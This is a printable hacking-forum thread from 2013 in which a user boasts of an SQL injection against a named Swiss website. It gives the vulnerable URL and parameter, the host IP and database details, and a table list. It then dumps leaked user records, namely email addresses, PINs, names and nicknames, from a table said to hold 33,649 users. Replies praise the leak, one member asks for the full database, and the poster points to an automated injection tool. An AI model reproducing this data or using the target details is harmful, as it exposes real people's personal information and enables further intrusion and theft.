Sinisterly
Airport.ch (SQL Injection) - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Airport.ch (SQL Injection) (/Thread-Airport-ch-SQL-Injection)

Airport.ch (SQL Injection) - y0y0 - 06-29-2013

Cool

[SQLdump]

greeting for all.!!
....this was my first post at sinisterly... so hopefully it be nice share..have 33649 user!! Biggrin

Wink2

Code:
Target:         http://www.airport.ch/content/detail.php?id=20
Host IP:        85.10.198.133
Web Server:     Apache
Powered-by:     PHP/5.2.17
DB Server:     MySQL error based
Resp. Time(avg):    889 ms
Current User:     web1476@localhost
Sql Version:     5.5.28
Current DB:     usr_web1476_1
System User:     web1476@localhost
Host Name:     tux239
Installation dir:     /usr
DB User:     'web1476'@'localhost'
Data Bases:     information_schema
        usr_web1476_1
        usr_web1476_2

======================================
Table found: airport
Table found: airport1
Table found: book
Table found: book1
Table found: flf
Table found: flfuser
Table found: laender
Table found: links
Table found: links_temp
Table found: metingp_master
Table found: metingp_rubriken
Table found: metingp_rubriken1
Table found: phpostcards
Table found: vote
Table found: vote_master
Table found: airport
Table found: airport1
Table found: book
Table found: book1
Table found: flf
Table found: flfuser
Table found: flfuserkopie
Table found: laender
Table found: links
Table found: links_temp
Table found: metingp_master
Table found: metingp_rubriken
Table found: metingp_rubriken1
Table found: phpostcards
Table found: vote
Table found: vote_master
==========================================================
Count(*) of usr_web1476_1.flfuser is 33649
===============================================
Data Found: email=0007020@gmail.com
Data Found: pin=4852344
Data Found: name=visacgrealityru
Data Found: nickname=visacgrealityru
Data Found: email=000@earpitchtraining.info
Data Found: pin=484602
Data Found: name=PeteMannin05
Data Found: nickname=PeteMannin05
Data Found: email=001@mobtv.info
Data Found: pin=5431955
Data Found: name=TonUncoro
Data Found: nickname=TonUncoro
Data Found: email=007apex007.pl@gmail.com
Data Found: pin=2914865
Data Found: name=nesabequeLank
Data Found: nickname=nesabequeLank
Data Found: email=007invimirumma@gmail.com
Data Found: pin=4306029
Data Found: name=Abedsdryday
Data Found: nickname=Abedsdryday
Data Found: email=0190padminaaa@mail.ru
Data Found: pin=950036
Data Found: name=0190padmin
Data Found: nickname=0190padmin
Data Found: email=021299@ua.fm


RE: [SQLiNjecti0n] [!] http://www.airport.ch/ [!] - Customer - 06-30-2013

Nice leak.

Not trying to be rude or anything.. just try to post pictures next time.

Nevertheless, good job man!

RE: [SQLiNjecti0n] [!] http://www.airport.ch/ [!] - Nefarious - 06-30-2013

I guess this is not a bad dump,
You should really type normal in the title though.

RE: [SQLiNjecti0n] [!] http://www.airport.ch/ [!] - y0y0 - 07-02-2013

(06-30-2013, 04:17 AM)Eks Wrote: I'll take that database off you if you care to upload it.

that was a good offerr dudee...thanks Evil

that just for POC only..if u want that dB..go download havij n grab it likee a fox.! Sarcasm

RE: [SQLiNjecti0n] [!] http://www.airport.ch/ [!] - Nefarious - 07-02-2013

(07-02-2013, 02:04 AM)y0y0 Wrote: that was a good offerr dudee...thanks Evil

that just for POC only..if u want that dB..go download havij n grab it likee a fox.! Sarcasm

Please tell me you didn't use havij?

RE: [SQLiNjecti0n] [!] http://www.airport.ch/ [!] - y0y0 - 07-02-2013

(07-02-2013, 02:05 AM)Kirito Wrote: Please tell me you didn't use havij?


of course im using havij...coz that was so easy...so no need to use sqlmap....Wink Sarcasm